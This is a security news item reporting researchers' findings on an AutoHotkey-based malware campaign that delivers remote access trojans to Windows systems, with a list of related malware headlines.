Security News > 2021 > May > Experts Warn About Ongoing AutoHotkey-Based Malware Attacks
Cybersecurity researchers have uncovered an ongoing malware campaign that heavily relies on AutoHotkey scripting language to deliver multiple remote access trojans such as Revenge RAT, LimeRAT, AsyncRAT, Houdini, and Vjw0rm on target Windows systems.
"The RAT delivery campaign starts from an AutoHotKey compiled script," the researchers noted.
AutoHotkey is an open-source custom scripting language for Microsoft Windows that's meant to provide easy hotkeys for macro-creation and software automation, enabling users to automate repetitive tasks in any Windows application.
In one variant of the attack first detected on March 31, the adversary behind the campaign encapsulated the dropped RAT with an AHK executable, in addition to disabling Microsoft Defender by deploying a Batch script and a shortcut file pointing to that script.
Lastly, a fourth attack chain discovered on April 21 used an AHK script to execute a legitimate application, before dropping a VBScript that runs an in-memory PowerShell script to fetch the HCrypt malware loader and install AsyncRAT. Morphisec researchers attributed all the different attack chains to the same threat actor, citing similarities in the AHK script and overlaps in the techniques used to disable Microsoft Defender.
In December 2020, Trend Micro researchers uncovered a credential stealer written in AutoHotkey scripting language that singled out financial institutions in the U.S. and Canada.
News URL
Related news
- Hackers Use Fake GlobalProtect VPN Software in New WikiLoader Malware Attack (source)
- New Cross-Platform Malware KTLVdoor Discovered in Attack on Chinese Trading Firm (source)
- Chinese hackers use new data theft malware in govt attacks (source)
- NoName ransomware gang deploying RansomHub malware in recent attacks (source)
- Iranian Cyber Group OilRig Targets Iraqi Government in Sophisticated Malware Attack (source)
- CISA warns of Windows flaw used in infostealer malware attacks (source)
- Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users (source)
- Hackers deploy AI-written malware in targeted attacks (source)
- N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks (source)
- New RomCom malware variant 'SnipBot' spotted in data theft attacks (source)